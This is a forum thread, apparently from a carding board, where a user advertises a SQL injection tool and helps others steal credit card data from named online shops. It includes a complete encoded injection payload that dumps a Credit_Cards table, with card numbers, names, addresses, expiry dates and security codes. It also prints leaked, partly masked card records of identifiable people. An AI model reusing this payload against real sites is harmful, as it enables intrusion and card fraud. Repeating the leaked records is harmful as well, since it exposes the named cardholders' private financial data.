next »

[kemsiro]

just wanna introduce to u guys the tool i coded .,

it can b used for xploiting sql injection bug from PHP/ASP/CFM sites .,

Link to demo tool >> http://kemsiro.org/tool

Watch the video for tool usage

Link to download the video >> http://kemsiro.org/uploaded/php_sql_injection.rar
4.38 MB .,

[MoRaAL]

Actually it sounds interesting . . . ill try it soon . . .im in Programming Workshop Class Right Now ! ow and +1 Popularity for you ! 

[kemsiro]

thanks : )

[Syroenix]

Hi kemsiro you are bright your video is good but i dont see you on yahoo.Also how to retrieve all the cvv2 or users information of one website .I saw a site with cvv2 :http://www.aemart.com/item.cfm?itemid=
i can only get the first and the last cvv2 with your tool

[Syroenix]

SAME FOR http://www.stiffs.com/whatif.cfm?gameid= i can only get first and last user

[Syroenix]

please help me on msn or yahoo post a video that explain how to get all information of a  website

[kemsiro]

it just works as it suposed to be.,

i have sent u reply on yahoo, check it out

another way when u dunno what being wrong

u can manually query by specify the ccid in the query =))

[kemsiro]

the query will be like this:

Code:

1 http://www.aemart.com/item.cfm?itemid=convert(int,(select%20top%201%20%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.ccid),char(32)))%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.custid),char(32)))%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.cname),char(32)))%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.cnum),char(32)))%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.caddr),char(32)))%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.czip),char(32)))%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.cexpm),char(32)))%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.cexpy),char(32)))%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.ccode),char(32)))%2bchar(32)%2bchar(124)%2bchar(32)%2bconvert(varchar,isnull(convert(varchar,A.del_date),char(32)))%20from%20Credit_Cards%20A%20where%20A.ccid=

u surely can do the rest yourself right? : )

| 73 | 271 | Noble K. Thomas                | 44171258279xxxx       | 4213 Echohollow Tr.            | 73003      | 05 | 09 | 069        | Oct 29 2006  6:32PM
 | 72 | 304 | william salus                  | 4828800053581xxxx      | p.o box 11744                  | 33339      | 06 | 08 | 426        | Jan  1 2050 12:00AM
 | 71 | 271 | Noble K Thomas                 | 44171258279xxxxx       | 4213 Echohollow Trail          | 73003      | 05 | 06 | 368        | Apr  5 2006  2:10PM
 | 70 | 15 | Dan Bayless                    | 43118337200xxxx       | 159 Lloyd Ave.                 | 41042      | 05 | 08 | 321        | Jan  1 2050 12:00AM
 | 69 | 135 | chris  radaios                 | 42642805590xxxx        | 798 s.westgate rd. des plaines | 60016      | 05 | 06 | 408        | Jun 21 2004  1:17PM

suggest you find another shop ., this shop can be used to practice only cuz most credit cards are expired =P

[hellotoall]

hello

i use this tool it is very nice

but something problem

when i get last order it give me cc info and when i want to get all cc info nothing happen

please help

[kemsiro]

same problem as above ., contact me if u need more help

[kemsiro]

topic closed ., i will no more develop this tool ~